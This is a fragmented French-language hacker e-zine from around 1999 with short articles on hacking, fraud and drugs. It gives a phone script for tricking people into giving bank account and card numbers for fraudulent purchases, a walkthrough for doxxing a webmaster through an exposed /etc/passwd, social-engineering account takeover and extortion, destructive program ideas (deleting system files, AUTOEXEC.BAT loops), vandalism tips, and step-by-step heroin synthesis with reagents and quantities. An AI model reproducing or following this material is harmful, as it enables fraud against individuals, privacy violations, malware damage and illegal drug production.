mai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c'est long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L&gt; merc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ur finir l'histoir: L. a été aquitté de ses torts. Il m'a aussi chaleuresement remercié...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Clad Strif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mparatifs des capacités d'anti-virus(de mars 1999), par Clad Strif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1. SYMANTEC NORTON ANTIVIRUS FOR FIREWALL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Recherche les virus sur le: HTTP, SMTP, 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recherche pas de magouilles sur les Apple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fait recherche les certificats (intéress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recherche pas de signatures (intéress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recherche pas les sources (intéress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filtre pas les E-mails (intéress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fait pas de gestionnaire de délivrance de courri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as d'OPSEC Compliant (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as d'OPSEC Compliant (UNI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fait pas de filtrage d'adresses url (intéress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fait pas de filtrage de spamming (haha!)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Il ne bloque pas les cookies (intéress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Les algorithmes de compression supportés: ARJ, ZI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détecte pas l'e-mail spoofing (intéressa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1.TREND INTERSCAN VIRUS WAL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Recherche les virus sur le: HTTP, SMTP, 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Recherche les magouilles sur les Apple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Recherche les certifica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Recherche de signatur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Recherche pas les sourc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Filtre les E-mail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Fait un gestionnaire de délivrance de courri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OPSEC Compliant (N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OPSEC Compliant (UNI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fait pas de filtrage d'adresses ur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Fait du filtrage de spammin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Il ne bloque pas les cooki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Les algorithmes de compression supportés: 19 typ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 détecte pas l'e-mail spoofing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insi on peut voir que TREND INTERSCAN VIRUS WALL est très fiable (plus que NORTON). Mais si cette liste est là c'est pour une raison: les résea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tilisent toujours ces deux là (en général, attention!), pour se sécuriser. Donc il est possible d'étudier ce que fait et ne fait pas chacun de ces utilitaires, pour mieux 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enseigner sur la cible! Un réseau n'utilisant que NORTON, ne sera pas assez sécurisé et présentera donc des failles (pas de filtrages mails par exemp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mparatifs des capacités d'anti-virus(de mars 1999), par Clad Strif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écryptage de passwords Linux et faille Multimani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 fichier password s'appelle généralement etc/passwd ou etc/shadow si c'est un password caché. Et pour les systèmes utilisant les yellow pages (NIS), il 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ccessible par la commande ypcat passwd. N'importe quel utilisateur d'une machine, le fichier etc/passwd est disponible en lecture, et donc il est recopiable. Dans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as de NIS, n'importe quel utilisateur d'une machine ayant accès au serveur NIS peut récupérer le fichier par la commande :ypcat passwd &gt; passwdn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 la machine utilise un mot de pass shadowed, ceux-ci sont dans le fichier etc/shadow qui est accessible en lecture uniquement par roo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ref... toutes ces techniques sont bien belles. Mais le problème du décryptage reste entier! Chaque password est soumis à un algorithme de cryptage qui ne va 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ns un seul sens, donc décryptage impossible. Et que le fichier soit shadowed ou non, le pass restera crypté, la seule différence sera la facilité d'accès à ce fichi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assword. Mais on peut quand même essayer de le cracker, il faudrait un crackpass, un dico et prier pour que ça march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is le répertoire etc/passwd est là et celui-ci peut fournir des informations (sur le login de l'administrateur) prenons un exemple typique, qui marche mais qui es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nventé, qui ne correspond que peu à la vérit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http://www.multimania.com/innvènechionne/et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 pour résultat, "ACCESS FORBIDDE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http://www.multimania.com/innvènechionne/etc/passw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a pour résulta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oot:*:0:0:Charlie &amp;:/root:/bin/cs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nnvènechionne:*:64501:150::0:0:Nonyme Alain:/web/mygale/innvènechionne:/bin/s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u encor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innvènechionne:*:64501:150::0:0:Nonyme MMP:/web/mygale/Alain:/bin/sh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gardez ce qui est en rouge. sur le site innvènchionne, il est, à priori, impossible de savoir qui dirige ce site (personnellement parlant). Grâce à cette faill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vez maintenant que le webmaster du site est Mr Alain Nonyme (s'il n'a pas menti dans ses infos multimania, lors de la création du site, ce qui est rarement le c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étant donné que Multimania n'a pas le droit de révéler les infos privées des gens, haha!). Donc votre recherche ne s'arrête pas là! Vous pouvez obtenir son Adres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ocale (exemple: paris543.club-internet.fr), en faisant un tracert de son adresse IP (faut l'avoir). Et vous aurez le nom de la ville du gars, et le pays ou il est grâce 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identifiant fr, be, ch et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Donc possibilités d'avoi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Le nom, prénom du ga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Son numéro de téléphon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Son adres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is si vous voulez allez plus loin: essayez un hack sur multimania, grâce à cette faille vous savez que le login pour être root est Charlie, une fois cette étape fai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rouver le pass, est parfois, un jeu d'enfant. Cette technique ne s'étend surement pas qu'à Multimania! Bien d'autres hébergeurs de sites doivent présenter cette fai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et pas qu'en Franc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Termes des différents protocoles, par Clad Strif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1.(Environnement TCP/I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ADSP: AppleTalk Data Stream Protocol. Flux de données au protocole AppleTalk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ARP: Address Resolution Protocol. Protocole de résolution d'adres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HCP: Dynamic Host Configuration Protocol. Protocole d'allocation dynamique d'adresses. Permet à un équipement distant d'obtenir les informatio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écessaires à l'établissement de la connexion, en particulier l'adresse I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FTP: File Transfert Protocol. Les liens hypertexte utilisant ce protocole commencent par ft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ICMP: Internet Control Message Protoco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P: Internet Protocol. La fonction ou rôle du Protocole Internet est d'acheminer les trames à travers un ensemble de réseaux interconnectés. Ceci est réalisé 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ransférant les trames d'un module Internet à l'autre jusqu'à atteindre la destination. Les modules Internet sont des programmes exécutés dans des hôtes et d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outeurs du réseau Internet. Les trames sont transférés d'un module Internet à l'autre sur un segment particulier de réseau selon l'interprétation d'une adres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Internet. De ce fait, un des plus importants mécanismes du protocole Internet est la gestion de cette adresse Inter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LDAP: Lightweight Directory Access Protoco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DU: Protocol Data Unit, à ne pas confondre avec UD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OP: Post Office Protoco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PP: Point-to-Point Protocol (IETF).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STN: Public Switched Telephone Network. Réseau Téléphonique Public Commuté.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IP2: Routing Information Protocol 2. RIP2 est utilisé pour échanger des informations de routage. Il dérive d'un premier protocole développé par Xero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RIP). Chaque machine qui utilise un protocole RIP2 a un processus qui envoie et reçoit des datagrammes transportés par de l'UDP port numéro 520.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SLIP: serial Line Interface Protoco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NMP: Simple Network Management Protocol. Le protocole SNMP est le langage que les agents et les stations de gestion (managers) utilisent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ommuniquer. C'est un protocole de type question/réponse asynchrone. Ce protocole est situé au niveau application du modèle OSI, c'est lui qui définit l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structure formelle des communications. SNMP est encapsulé dans des trames UD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CP: Le protocole TCP est défini dans le but de fournir un service de transfert de données de haute fiabilité entre deux ordinateurs "maîtres" raccordés sur u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réseau de type "paquets commutés", et sur tout système résultant de l'interconnexion de ce type de rése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UDP: User Datagram Protocol. Le protocole User Datagram Protocol (UDP) est défini dans le but de fournir une communication par paquet unique en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deux processus dans un environnement réseau étendu. Ce protocole suppose l'utilisation du protocole IP comme support de base à la communic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1.Le protocole X25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 protocole X25 définit l'interface entre un ETTD ( Equipement Terminal de Traitement des Données ) et un ETCD ( Equipement Terminal de Circuit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onnées ). Il a été adopté par le CCITT en septembre 1976. On entend souvent par X25 l'ensemble des protocoles liés à X25 et qui couvre les couches 1 à</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3 du modèle OSI. Pourtant, le terme X25 désigne uniquement le niveau 3 ou niveau paquet transporté entre les champs d'information des trames LAPB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LAPB: Le protocole LAPB est le protocole de niveau 2 qui transporte les paquets X25.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1.Les protocoles Novel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BCAST: BroadCAST sert à diffuser les annonces du réseau informant l'utilisateur qu'il a bien reçu un messag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MP: Burst Mode Protocol. Le BMP est en fait un type de paquet NCP. BMP a été créé afin de permettre de multiple réponses pour une seule requête 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donc transférer jusqu'à 64 ko de données pour une seule requête en lecture de fichier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DIAG: DIAGnostic responder. DIAG est très utilisé pour analyser les LAN Netware. DIAG peut être utilisé pour tester les connexions et les configura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PX: Internetwork Packets eXchange. IPX est l'implémentation Novell du Internet Datagram Protocol (IDP) développé par  Xerox. IPX est un protoco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datagramme sans connexion qui transmet des paquets  à travers Internet et fournit aux stations Netware et aux serveurs de fichiers des services d'adressage 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de routage inter résea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NCP:  Novell Netware Core Protocol. NCP s'occupe de l'accès ressources du serveur primaire Netware. Il fait des appels de procédures au NFS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Netware File Sharing Protocol)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RIPX: Routing Information Protocol. RIPX est utilisé pour collecter, maintenir et échanger des informations de routage correctes entre les passerelles da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Internet. A ne pas confondre avec un protocole TCP/I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AP : Service Advertising Protocol. Avant qu'un client ne puisse communiquer avec un serveur, il doit savoir quels serveur sont disponibles sur le résea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tte information est rendue disponible grâce au Novell's SAP. Le service  SAP diffuse l'information sur la liste des serveurs connu à travers tout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réseau.Ces serveurs peuvent comprendre des serveurs de fichiers, des serveurs d'impression, des serveurs d'accès Netware, et des serveurs distan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ER : SERialization. Nan ce n'est pas pour trouver des serials.. Pour assurer qu'une simple version de Netware n'est pas en train d'être chargée sur différent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erveurs, l'OS diffuse des paquets appelés paquets de sérialisation pour déterminer si il y a multiple copies du même OS sur le réseau. Ces paquets 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contiennent qu'un seul champ de 6 octets appelé champ de donnée de sérialisat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DOG : WatchDOG. Le WDOG fournit les validations de connexion aux stations sur le système Netware et rend compte à l'OS lorsque une connexion do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être fermée pour cause de trop longue période sans communica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Réseaux FT, par Clad Strif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Je vais d'abord expliquer comment marche le réseau France Telecom pour faire transiter les fichiers d'information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enons l'exemple d'une entrprise FT moyenne, un poste est relié à l'internet. Ce poste n'est pas en communication avec le réseau intranet. Ce qui veut dire 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ttaquer à ce poste revient à attaquer un poste dans le vide. La seule faille qui existe est par rapport à la réception de mails: on peut envoyer des mails à Fr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elecom, ceci seront récupérés par ce poste. Et comme les gars quio travaillent à FT peuvent aussi accéder au courrier, il est possible d'envoyer des fichiers, que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ersonne en question reecevra. Envoyez un méchant virus bien sadique que vous aurez construit (donc indétectable à l'antivirus et donc mieux accepté), en sort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que c'est un programme qui fait apparaitre une animation, ou un jeu et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 comment ils font transiter les informations s'ils sont pas reliés à internet? Par les cables ou autres systèmes. Ouais des aménagements de cables, par exemple,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ermettent aux informations de circuler sans risque d'interception. Quoique SANS risques serait aller un peu vite parler. En effet, il suffirait "d'intercepter" un cab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pour faire les branchements adéquats. Mais faudrait avoir un portab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t le hacking alors? Impossible si on est par internet, et en plus FT a pris des mesures radicales: chaque tentative de hack, des ping répétés, sont enregistrés ave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IP de la personne, et un programme se charge d'avoir le N° de téléphone et l'adresse du gars. En effet FT a accès aux informations privées et a le droit de s'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erivir si c'est jugé utile. Et sur les 900 tentatives de piratages journalières, environ 10 descentes de police par mois sont organisées pour arrêter les plus audacieux.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Achats gratos,  par Clad Strif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ur faire des achats tranquillement et gratuitement, y'a pas plusieurs chemins. Faut avoir: des N° de compte en banque, et les noms et prénoms des gens à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orrespondent ces N° (celà comporte naturellement la ville, adresse, etc...). Pourquoi avoir toutes ces infos? Car la croissance de faux N° de cartes a forcé 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ystèmes d'achats online à se sécuriser (et aboule les infos). Alors comment faire votre affaire: prenez un botin (pages blanches), et recherchez les noms des gar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habitants votre quartier: vous tomberez sur quelqu'un, appelez cette personne, et en prenant une voix féminine dites lu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onsieur A.Nonyme? Voilà, le Credit Lyonnais aimerait avoir votre N° de compte bancaire pour pouvoir correctement valider les données à envoyer lors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ormulaires concernant nos clients: on doit agir selon le protocole *etc... etc...*" Sortez un petit baratin convaincant, si le mec est au Crédit Lyonnais vous devri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obtenir son N° de compte, sur 65.000.000 d'habitants, y'a biens des gogos, ou des vieux qui y connaissent rien ET qui sont au Crédit Lyonna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roblème actuel: ça peut revenir cher en communication téléphonique, et si le mec a un boitier France Telecom, il va griller le N° d'ou vous appele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Solution: prenez des cibles que vous connaissez pas beaucoup, et tapez le 3651 avant de taper le N° de tel ex: 3651 06 55 55 55 55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roblème qui va se poser: sur quel site faire ses achat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vous voulez vous achetez la dernière version des jeux proposés sur le site "jeuxmerdiques.com", alors vous recevrez le programme sur votre HD, pas par la pos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roblème futur: le prix du produit étant trop cher, la victime a repéré un trou anormal dans son compte, et on serait en mesure de vous retrouv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Solution: faites vos achats à partir d'un cybercafé ou des postes de votre bahut, si vous avez accès au ne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vous faites des achats sur un site ou vous devez recevoir des objets par courrier, faites vous envoyer le colis à l'adresse du mec à qui vous avez choppé le N°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ompte, que vous connaissez pas bien sur. Allez le voir et prévenez le qu'un colis arrivera chez lui par erreur. S'il demande ou vous habitez, donnez lui une adres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idon et le jour ou le facteur passe allez le voir avant qu'il se casse de chez lui. Dites que vous avez préféré venir le chercher, car votre frère veut être sur de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recevoi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roblème actuel: si la personne vous demande pourquoi c'est elle qui a reçu le colis, dites que votre frère a mal répondu au formulaire par ordinateur. Si el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demande plus d'explications, vous n'en savez pas pl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Hacker un serveur (Avec le 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xml:space="preserve">Prenons le serveur essay.com à hack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onditions pour bien réussir son cou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Que le serveur soit françai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Que vous soyez pas trop regardant sur le coût de la communication téléphoniqu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Que le serveur cible soit pas un gros serveu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Avoir des infos sur le webmaster du serveur (nom, prénom, e-mai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llez sur le serveur, http://www.essay.com. Vous y voilà. On va pas faire du brute force hacking ni des techniques reposant sur les failles du réseau à l'autre bou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uisque cet article porte sur le Social Engineering. Voyez, le site: celui-ci en général à une bannière de statistiques (exemple: e-stat), ou d'autres. En général ce gen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 services proposent au webmaster du site utilisant leurs services un password pour modifier leurs informations, ou accéder à leurs compte (dans le cas de forum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chat, etc...)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 bien sur ce genre de services met un lien direct vers leur site. Héhé, on avance. une fois sur le site du serveur porposant ses services, notez l'url. Sortez WS P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O PACK, ou allez sur http://www.networkssolutions.com. A partir de là, vous pouvez trouver des informations en faisant un DNS lookup dans le cas de W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NG PRO PACK (dans la partie "Infos"), ou faire cette recherche sur NetworksSolutions. Vous obtiendrez des infos comme: téléphone du webmaster ou des ge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occupant de ce genre de servic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Vérifiez que c'est en France sinon la facture téléphonique va en prendre un coup.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Si c'est pas en France parlez bien (avec l'accent), la langue du pays vers lequel vous appele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N'ayez pas l'air trop technique en parlant, et ne vous affolez pas. En gros mettez vous vraiment dans la peau du webmaster du serveur essay.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ur ceux qui comprennnent pas ou je veux en venir: vous allez appeler le webmaster fournissant les différents services (e-stat par exemple, c'est français en pl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 prétexter que vous n'avez pas pu accéder à votre compte de statistiques car le password ne marche pas, et que vous trouvez ça bizarre. Sortez au webmast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en voulant récupérer le pass par l'intermédiaire de votre compte email, vous vous êtes aperçus que celui-ci aussi ne répondait plus, alors vous avez décidé de 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ontacter. Le webmaster va alors vous demander de vous authentifier ou bien va vous envoyer chier! Pas de problèmes pour l'authentification: le login est celui d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site dans 80 à 90% des cas, parfois il faut des N° d'inscriptions, vous pouvez les récupérer dans le code source de la page (exemple e-sta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Tout a marché: vous avez le pass, et vous savez que le webmaster ne va pas porter plainte même si vous avez hacké son site: alors allez-y sans problèm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Tout a marché: vous ne connaissez pas le webmaster: prévenez le d'un trou de sécurité, et demandez du fric en échange des infos que vous posséde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Rien n'a marché: vosu n'avez pas eu les pass, car le mec au bout du téléphone était trop méfiant et il vous a grillé quand il a entendu votre maman vosu appeler po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manger! :-)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Koi faire durant vos temps des fetes, par Dukest4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plus l'fun que j'aime faire cer tu va chez l'voisin pi tu pog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 set de lumiere (prend en plus qu,un si tu peut) sans qu'y t'vo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 t'attend qui fasse noir pi ter etant d'un boute a lotre de la r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sé dans neige sa parrait pas. pi quand ya un char qui passe POW!!!</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ol ou bin sinon tu pogne une coupel d'ampoule pi tu fa des guer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ampoule a'c tes amis pour remplacer les boule de neige haha seri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r dangeureux mais c ca kier hot... lol ou bin sinon ske j'Te consei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r tsé l'hivers fa fraite... pi quand tu pitch des oeuf l'hiver CR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e c chien devoir decoller toute ca de ta vitre quand sa toute pogn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n glace hahahaha... ou bin aussi tu peut verser de l'eau dans u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ntré d'un char quier stationné en pente ou watheverer en tout c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ya plein d'affaire dememe bin l'fun a faire l'hiver... faut ien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re original dans ses mauvais coups... ANARCHY!!!!!!!!!!!!!!!</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 suiv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par Dukester et Coca-Cola</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Theorie sur la creation de programme chiant, par Hope_ma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lut tout le monde moi chu Hope_Man... un des programmeur de QH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i pour mon premiere article. ben jva vous parler de ce que le mo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haisse qui arrive sur leur ordi! En Theorie c les virus qui font c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is la seule difference entre mes programme et les virus c quil ne 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produise po euh meme. Il sont indedectable. Pi pour la plupart destruct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ommencons par expliquer le principe du programme chi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Il faut que ca fasse des domma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Il faut que ca soit discret. pas Daffaire gen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Bienvenue sur Modem Booster v1.0" un fake de prog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upgrade un 2400 en 56K.. le monde vont sen douter en est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un SILENT program c le mieux. ou un fake message d'erro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gt; Ca veut dire que ya rien qui se voi a l'executio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3-Si vous vouler po faire de SILENT.. faite un prog FA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ais pas CAVE... Genre mettons un fake compresseur mp3.</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i le size de la file doit aller avec le fichi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 rare que un compresseur mp3 ca un size de 20k</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etter genre dla garbage apres les derniere byte dla fi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ur lagrandir.. le EXE run pareille! Dans le prochain zin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jva donner un prog qui fait ca lui meme. En Qbasic bien s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steure des tite idee de programme qui font chier en sacra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Un affaire qui delete les fichier system C:\*.* &lt;-- FIF MAIS DESTRUCT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Un prog qui fait plein de repertoire avec des nom GARBAGE genre ÄÆ¯Æ£Æ²</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spa deletable ste shit la! sauf avec Deltree.Exe en mode do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3-Ou ben rajouter des tite ligne dans le AUTOEXEC.BAT du sty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All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aus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Goto All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E gars va peser en esti sur le piton avant que ca arrete :) HEHEHEHE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4-Pour le reste je laisse votre imagination runner.. car chu quand meme p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ur reveler mes secret :) JOK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i si vous avez des bonne idee ben Contacter moi ou RIPP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ar email : Ripper ------&gt; nicolas_hot@hotmai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Moi(HoPe_MaN)&gt; hope_man99@hotmail.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k si vous ete un newbies. ca va vous aider.. sinon .. ben si ca vous ai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cool.. tk je sais ca fait un peu poche comme premiere article mais c util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our le monde qui save po.. Truster moi! c par experie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 FIN &lt;------ PAr HoPe-MaN</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Opium et ses dérivé, par  T\\'IST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able des matiè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   Intr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I  Histor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II Qu'est-ce que l'opiu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V  Comment la produ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 Intr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Il ma fallu plusieur effort pour trouver comment ce faisait l'opium. Si vous faites des recherches sur internet, très peu de site vous apprenderont des chose intéressante. Mais après avoir lu ceci, vous n'aurez surement pas besoin de consulter autre chose. Si j'ai choisi de parler de l'opium, c'est que cette culture est plus accessible, et plus rentable que celle de la marijuan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I Histor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Cette section est longue et ennuyeuse. Je ne vous en veux pas si vous la passez, mais j'ai eu comme ordre d'écrire le plus possible. C'est pourquoi je fais cette section. Les dates sont aproximativ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4000 BC: Les effets de la sève du pavot sont découvers part les sumeria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400 BC : Hippocrate prescrit des tisanes de pavot à ses pati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50 AD : L'opium apparait en chine grâce au importateur arabe. Hua To utilise l'opium et le canabis à des fins médical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600   : L'opium est fumé au lieu d'être avalé. On le mélange souvent à du tabac. Cette pratique proviendrais de la région de Jav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800   : L'Inde britanique aquiert le monopole du traffique de l'opiu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805   : Découverte d'un composant de l'opium; la morphine. Cette découverte sera suivit de celle de la codéine(1832), et de la papaverine(1848).</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839   : L'empereur chinois Qing banit l'opium et fait saisir 20 000 baril. La réaction des britanique est d'attaquer le port de Canton. Début de la première guerre de l'opium où les anglais obtiennent HongKo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850   : On commence à s'injecter les composants purent de l'opiu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856   : Début de la 2ieme guerre de l'opium. Les chinois sont encore défait. Le commerce de l'opium est légalisé en chi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860   : L'armée americaine donne de la morphine pour calemer la douleur de ses soldats. Plusieurs soldats deviennent dépenda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898   : Bayer découvre un substitut a la morphine qui ne provoque pas de dépendance; la Dyacétilemorphine. Elle agit 3x plus rapidement vu ca solubilité plus gra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914   : Le gouvernement adopte des lois anti-drogues qui rendent illegal la posession de dérivé de l'opium sauf pour des établissement contrôl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970   : La concurence dans le domaine de l'opium au USA se fait maintenant entre l'Europe et le Mexi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ujourd'hui, l'Asie produit plus de la moitié de l'opium mondiale. elle peut produire 200 tonnes métrique d'opium par anné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II Qu'est ce que lopiu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L'opium contient plusieur anti-dépresseur tel que l'héroine, la codoine, et la morphine. La morphine compose 10% du poids net de l'opium. Je vous expliquerez plus loin comment l'extraire. L'opium provoque un euphorie et un sentiment de bien être, ainsi qu'une moins grande sensation de la douleur. Un usage régulier amène une certaine résistance, ce qui pousse à utiliser de plus grande dose.  L'usage répété provoque aussi une dépendance. Un arret brusque de cette drogue peut provoqué des symptome de maladies. L'opium provient d'une plante annuel nommé pavot somniferium. Cette plante a une tige d'environ 50 à 90 cm. La fleure de cette plante est mauve. Elle est facile a différencier des autre sorte de pavot. Plusieurs sorte ont des fleures jaunes, blanches, rouges ...celles-ci ne contiennent pas (ou pas suffisament) de morphine =(. La fleure a 4 pétales. Le cycle de vie de cette plante est d'environ 180 jours. Elle ne fleurit qu'une fois. L'opium provient de la cosse de graine qui est facilement reconaissable apres la fleuraison. Les feuilles ne serve a rien, sauf de nouriture pour animaux de ferme. Elle n'ont aucune valeur commerciale. La cosse est la seul a contenir les alcaloid qui nous intéresse. La sève blanche qui est a 95% la sécrétion de la cosse, est, une fois séché, de l'opium. Le pavot est illégal au USA depuis 1942 (à vérifié).</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IV Comment la produ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Pour cultivé le pavot donc vous avez besoin, utilisé les même méthode que pour la marijuana (ex: terre noire riche un vitamine, ampoule assé puissante pour représenté la lumiere du soleil, etc...). Le pavot ne nécessite pas beaucoup d'eau. Si vous pouvez le faire poussé à l'intérieure, vous aurez probablement une meilleur qualité d'opium. Les pluies pendant le 2ieme et troisième mois de croissance peuvent "drainer" une partie des alcaloids de la plante. L'opium est principalement asiatique. L'opium americain (brown opium) vient du Mexique et de Columbie. Jespere que bientôt, grâce à cette article, l'opium québecois introduits par les QHAs sera aussi connu que le "brown opium". Je n'espère quand même âs détrôné l'Asie. La meilleur date pour la plantation au Quebec serait d'après moi au début de juin, voir la fin mai, pour tiré profit de long jour et du climat plus clément. Le Québec n'est cependant pas le meilleur endroit pour la culture vu sa courte été. Mais si vous prenez bien soins de vos plante, la récolte sera bonne. Voila le moment intéressant. Environ 2 semaine apres la chute des pétales. Vous examinez vos plants, exacto et éprouvette (ou autre récipient) à la main. Pour recueillir l'opium, vous entaillez les cosses pas trop profondement, mais assé quand meme pour que la sève coule. Cette opération ce fait mieux lorsque le soleil n'est pas trop fort. Le soleil fait coagulé la sève. Le fait intéressant est que les plantes peuvent être entaillé plus d'une fois si vous leurs faites attention. Une cousse peut produire en moyenne jusqua 80 milligram d'opium. Vous devriez donc en avoir plus d'une. Faites séché; Vous avez maintenant de l'opium brute. Vous pouvez la fumer ou la vendre, ou continuer de lire et d'amélioré la qualité de votre produit. L'opium brut peut contenir des impurtés. Faites bouillir de l'eau et ajouté lui votre opium brute. Filtré ensuite votre opium liquide avec du coton a fromage et refaites séché. L'opium ainsi retenue (80% de la masse d'opium brute environ) doit être brunâtre. cette opium est maintenant de grande qualité et peut être vendu très cher. L'opium est surement le commerce le plus payant qui sois si vous avez l'espace requis pour plusieurs plantes. Comme toute drogue, plus la qualité est haute, plus on peut exigé un prix fort. L'opium brute contenait déjà 10% de morphine ainsi que près d'une 50aine d'autre substance intéressante. Maintenant, Pour l'en extracter prenez votre opium brute (vous aviez juste à tout lire avant de cuisiner votre opium sucker) faites la bouillire et ajoutez lui de la chaux. Le procédé que je suis en train de vous expliquer devrais vous permettre de recueillir 20% de votre poids d'opium brute en morphine pure. La chaux rend la morphine soluble. Tout le reste des impurtées se ramasse au fond. On recueille notre présieuse eau et on la filtre. On la rechauffe en lui ajoutant du chlorure d'amonium jusqu'à obtenir un ph de 8 à 9. Dans moins de 1 ou 2 heure, la morphine devrait se solidifié. On refiltre avec du coton a fromage (ou un autre tissu qui retient plus) la substance. On tord et essort bien, puis on met a séché. Une foi sèche, la morphine devrait être couleur café. Vous pouvez encore vous arrêtez ici ou continuer de purifier. Pour continuer à purifier, on rechauffe, on ajoute de l'acide hydrochlorique et du charbon, puis refiltré, puis rechauffé et on peu continuer le processus 5 ou 6 fois. Si vous avez commencé le processus avec 10 kilo d'opium brute, vous avez maintenant 1.3 kilo de morphine. Les dimensions habituelle de ces briques sont de 4x10x12 cm. Vous pouvez encore une fois vous arrêter ou continuer le traitement, cette fois pour obtenir de l'héroine. Pour faire une base d'héroine, le procédé peut prendre de 12 à 14 heures. Tout ce que vous avez à faire c'est de prendre votre morphine et la dissoudre dans l'eau chaude. Prenez un plat en stainless ou quelque chose du genre car nous ajoutons de l'acide qui pourrait provoqué de la rouille. On ajoute de l'anhydride acétique (je ne sais pas en quel quantité, mais pas plus de 2.5 kilo par kilo de morphine), on ferme bien le récipiant, puis on chauffe à à peu près 85 degré pendant 2 heures. Important de ne pas porté à ébulition. Maintenant que l'acide a réagit avec la morphine, on ajoute 3 fois plus d'eau que d'anhydride acétique et du charbon pour filtré les impurté coloré. On dissoue ensuite 2 fois et demi de bicarbonate de soudre pour ce que l'on avait de morphine. On ajoute cette solution à l'héroine jusqu'a ce qu'il n'y est plus d'effervescence. Il devrait se formé un sel au fond de votre bassin; la base d'héroine. Faite évaporé le liquide et ramasser l'héroine. Vous devriez avoir environs 60% de la masse de morphine en héroine. Maintenant, décision finale pour la purification de notre opium: héroine à fumer(#3) ou héroine à piquer(#4). Pour l'héroine no3, plutot simple. On rechauffe, puis on ajoute de l'acide hydrochlorique. On ajoute ensuite 1 kilo de caféïne par kilo d'héroine. On refait séché, puis on broit et tamise notre poudre. Le procédé peu prendre jusqu'à 8 heures, mais ne nécessite pas de grand talents en la matière. Par contre, l'héroine no4 est un peu plus compliqué a produire. On prend notre mixture et on lui ajoute 3 fois d'eau que ce que l'on avait ajouté d'anhydride acétique. Puis, un PETIT PEU de chloroforme. On laisse reposé 20 minutes. Les inpurtés colorées ainsi qu'un liquide rougeâtre devraient se déposer au fond. L'eau propre est délicatement transvidé. Ensuite commence la purification au charbon. On répète cette étape jusqu'à ce que notre solution soie PARFAITEMENT claire. Tout ce que vous avez a faire, c'est d'ajouter du charbon pour purifier, puis filtré, et recommencé. Important de s'assuré que votre solution est incolor, car si vous précipité et que votre poudre n'est pas blanche il faudra redissoudre, refiltrer et reprécipiter. Pour précipiter, ajoutez 1 kilo de bicarbonate de soude par .5 kilo de morphine dissoute. TERMINÉ!!! Mais comme on peut TOUJOURS améliorer la qualité, voici encore des traitement facultatif utilisé par les pros.1- On peut ajouter 2.25 mililitre d'alcool ethylique par kilo d'héroine pour éliminer les traces de bicarbonate de soude. Pour faire évaporé, on place dans un bain de glace pour faire une sorte de crême glacé, puis on réfrigère et on ventile pour faire évaporé l'alcool très lentement (environ 2 heure). 2- Pour encore amélioré la qualité, on peut se mesurer 3 mililitre d'alcool éthylique, 3 mililitre d'ether et 104 mililitre d'acide hydrochlorique. On dissoue notre poudre dans la moitié (52ml) de l'acide et le tier (1ml) de l'alcool. Pour aider le solid a se dissoudre, on ajoute l'acide shot-by-shot. Vous devriez tester l'acidité du produit à l'aide de papier tournesol. Maintenant, attention. On ajoute le reste de l'alcool et la moitié de l'ether. Le produit est maintenant très volatile et inflamable donc surveillez le bien. Après environs 15min, des cristaux devraient se former. Des leur apparution, ajoutez le reste de l'ether. Ensuite, on selle le contenant et on laisse reposer de20 à 60 minutes. La solution devrait maintenant être assé consistante. Filtrez la avec un papier filtre propre, replier le papier autour les cristaux, puis faites séché doucement. Remarque, on produit rarement plus de 20 kilo du coup de cette maniè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de by: T\\'IST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or: -=QH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 Wasteland-2000 [http://www.surf.to/wasteland]</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color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comment telephoner Bankkksss®©™ a partir d''un sans fil sans avoir d'outdial, Par Fozzy et  PhReAkOl  Maker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>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lut a tous bandes de lamers que vous etes,,je presente le mag PhReAkAzOïD™ et je me presente Lord PhReAk tout d'abord,Bankkksss®©™ est un mot invente par les mecs de mon quartier signifiant GRATUIT,FREE,FRANCO,c'est pour cela que j'insiste  sur le copyright donc aucun lamers ne pourra dire ou surtout pretendre que c'est lui qui l'a invente sauf si il habite da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on quartier ce qui m'etonnerai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onc voila le moment que vous attendiez tous arrive,le principe est de pouvoir telephoner  sans bourse delier (vive le phreaking,Fuck France Telecom and other Telcos) a partir d'un sans fil,cette technique melange carding,social engineering et imagination donc voici les differentes etap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rt one : Social engineering</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emierement, procurez vous un numero de carte bleue avec bien sur date de validite ,nom et prenom du porteur de la carte et le tour est joue,faites vous passez pour des flics,Fuck tele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toute autre organismes,exemp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 victi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bonjour M(onsieur) (adame) ici la societe Vanikétagranmaire nous vous appellons car nous avons un probleme informatique suite a un virus qui s'est refugie dans un de nos ordinateurs centra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O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pouvez vous nous donner votre adresse exacte avec la ville et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oui bien sur 45 rue Tétrocon , 00001   Nigoville et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la personne marche c'est gagne,sinon rappeler quelqun d'autre en etant plus persuasif.</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e jamais demander le n° de CB en premier la personne vous racrocherait au n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donc voila je tape sur l'ordinateur,ha oui j'oubliais pouvez vous nous donner le numero de votre carte pour voir si il correspond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oui c'est le 4977 1234 4567 8910  date de validite  12/99</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e fois toutes ces precieuses info recoltees,on peut passer a l'etape suivant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rt two : La comman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a partie a mon avis,la plus delicate il s'agit de commander le telephone miracle en l'envoyant a une adresse precise ( pas la votre bandes de cons),vous passez la commande par minitel methode la plus rapide et la plus anonyme, par l' INTERnational NETwork ou par telephone (j'opterais plutot pour le minitel).Vous commander un telephone sans fil multicombines avec la plus grande portee en general 400 m et deux ou trois combines supplementaires pour vos potes ou pour en avoir en reserve,puis envoyez tout ça a une adresse que vous aurez definie choisissez l'envoi en 24h si vous n'etes pas pati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rt three : La reception du paqu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ux jour apres avoir fait la commande,rendez vous a l'adresse ou vous avez envoyez le paquet avec soit une lettre bidon de la boite de VPC que vous aurez faites vous meme mentionnant une erreur de leur part pour l'adresse de reception soit si vous avez au moins 25-30 ans vous faire passez pour un des livreur pour recuperer le paqu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rt four : le reenvoi du paqu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pres avoir configurer tous les combines,appelez quelqu'un de votre voisinage que vous ne connaissez pas forcement mais dont vous connaissez l'adresse et dont vous vous foutez et la encore faites vous passer pour un animateur radio,exemp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 victi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bonjour M(onsieur) (adame) ici radio Phreak voulez vous participer a notre grand 